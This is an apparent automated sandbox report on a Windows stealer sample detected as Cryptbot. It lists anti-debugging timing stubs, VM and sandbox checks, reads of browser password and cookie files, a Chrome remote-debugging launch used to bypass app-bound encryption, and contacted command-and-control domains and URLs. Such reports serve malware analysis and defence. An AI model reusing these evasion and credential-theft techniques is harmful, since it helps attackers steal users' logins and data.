Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72200A9 second address: 722010A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F80798BCE5Fh 0x00000009 xor ax, 55CEh 0x0000000e jmp 00007F80798BCE69h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F80798BCE60h 0x0000001a adc esi, 09552648h 0x00000020 jmp 00007F80798BCE5Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 and esp, FFFFFFF0h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722010A second address: 722010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722010E second address: 7220129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220129 second address: 7220158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8078BD338Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220158 second address: 7220180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F80798BCE67h 0x00000008 mov ax, 875Fh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220180 second address: 7220184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220184 second address: 722019B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722019B second address: 72201A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72201A1 second address: 722020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F80798BCE5Ch 0x00000010 sbb si, 5228h 0x00000015 jmp 00007F80798BCE5Bh 0x0000001a popfd 0x0000001b movzx eax, bx 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 mov ebx, 76AEAF04h 0x00000026 pushfd 0x00000027 jmp 00007F80798BCE5Dh 0x0000002c sub eax, 5188C246h 0x00000032 jmp 00007F80798BCE61h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F80798BCE5Dh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722020B second address: 7220227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220227 second address: 722022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722022B second address: 7220231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220231 second address: 7220270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F80798BCE5Eh 0x0000000f xchg eax, edi 0x00000010 jmp 00007F80798BCE60h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220270 second address: 7220278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, ax 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220278 second address: 722028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80798BCE62h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722028E second address: 722029D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722029D second address: 72202A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72202A1 second address: 72202B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72202B9 second address: 72202BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72202BF second address: 7220336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov edi, esi 0x00000011 movzx ecx, bx 0x00000014 popad 0x00000015 mov dword ptr [esp+24h], 00000000h 0x0000001d jmp 00007F8078BD338Bh 0x00000022 lock bts dword ptr [edi], 00000000h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a call 00007F8078BD338Bh 0x0000002f pop eax 0x00000030 pushfd 0x00000031 jmp 00007F8078BD3399h 0x00000036 add ecx, 2B1ECD46h 0x0000003c jmp 00007F8078BD3391h 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220336 second address: 722033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722033C second address: 7220340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220340 second address: 72203BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F80E956EF41h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F80798BCE65h 0x00000015 or si, C556h 0x0000001a jmp 00007F80798BCE61h 0x0000001f popfd 0x00000020 call 00007F80798BCE60h 0x00000025 push ecx 0x00000026 pop edi 0x00000027 pop ecx 0x00000028 popad 0x00000029 pop edi 0x0000002a jmp 00007F80798BCE5Dh 0x0000002f pop esi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F80798BCE68h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72203BB second address: 72203CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230B74 second address: 7230BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 096Ah 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 jmp 00007F80798BCE5Dh 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F80798BCE68h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230BAE second address: 7230BD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8078BD3395h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230BD5 second address: 7230BDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230BDB second address: 7230BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230BDF second address: 7230BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723091F second address: 7230944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230944 second address: 723096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov si, B2FFh 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f jmp 00007F80798BCE62h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1614925 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 16149F6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 17CFD34 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2510 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2763 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2772 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 1966 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 8032 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7148 Thread sleep count: 53 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7148 Thread sleep time: -106053s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7084 Thread sleep count: 2510 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7084 Thread sleep time: -5022510s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3104 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7056 Thread sleep count: 2763 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7056 Thread sleep time: -5528763s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7104 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7104 Thread sleep time: -110055s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7108 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7108 Thread sleep time: -100050s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7080 Thread sleep count: 2772 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7080 Thread sleep time: -5546772s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7152 Thread sleep count: 63 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7152 Thread sleep time: -126063s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7780 Thread sleep count: 1966 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7780 Thread sleep time: -196600s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7780 Thread sleep count: 8032 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7780 Thread sleep time: -803200s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe Binary or memory string: Hyper-V RAW
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.1964328077.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2115039950.0000024A81E18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_008C8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_008C8230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_008C116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_008C116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_008C11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_008C11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_008C1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_008C1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_008C13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_008C13C9
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1384D0 cpuid 8_2_6C1384D0
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 8.2.service123.exe.6c0b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 7776, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2046769091.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2046863245.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2046769091.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7004, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2046769091.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2046863245.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2046769091.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7004, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1561522 Sample: file.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Antivirus detection for URL or domain 2->58 60 9 other signatures 2->60 7 file.exe 5 3 2->7         started        12 service123.exe 2->12         started        14 service123.exe 2->14         started        16 2 other processes 2->16 process3 dnsIp4 40 fvtekk5pn.top 34.116.198.130, 49730, 49741, 49742 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 7->40 42 127.0.0.1 unknown unknown 7->42 44 home.fvtekk5pn.top 7->44 36 C:\Users\user\...\unmYCIPOHmXNjqOesrEy.dll, PE32 7->36 dropped 38 C:\Users\user\AppData\...\service123.exe, PE32 7->38 dropped 68 Attempt to bypass Chrome Application-Bound Encryption 7->68 70 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->70 72 Uses schtasks.exe or at.exe to add and modify task schedules 7->72 74 7 other signatures 7->74 18 service123.exe 7->18         started        21 WerFault.exe 21 16 7->21         started        24 chrome.exe 7->24         started        27 schtasks.exe 1 7->27         started        file5 signatures6 process7 dnsIp8 62 Multi AV Scanner detection for dropped file 18->62 64 Found evasive API chain (may stop execution after checking mutex) 18->64 66 Found stalling execution ending in API Sleep call 18->66 34 C:\ProgramData\Microsoft\...\Report.wer, Unicode 21->34 dropped 46 239.255.255.250 unknown Reserved 24->46 29 chrome.exe 24->29         started        32 conhost.exe 27->32         started        file9 signatures10 process11 dnsIp12 48 www.google.com 142.250.181.68, 443, 49759 GOOGLEUS United States 29->48 50 edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 29->50 52 default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 29->52
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
239.255.255.250
 unknown Reserved
unknown unknown false
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.250.181.68
 www.google.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
home.fvtekk5pn.top 34.116.198.130 true
www.google.com 142.250.181.68 true
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 217.20.59.37 true
fvtekk5pn.top 34.116.198.130 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
    		high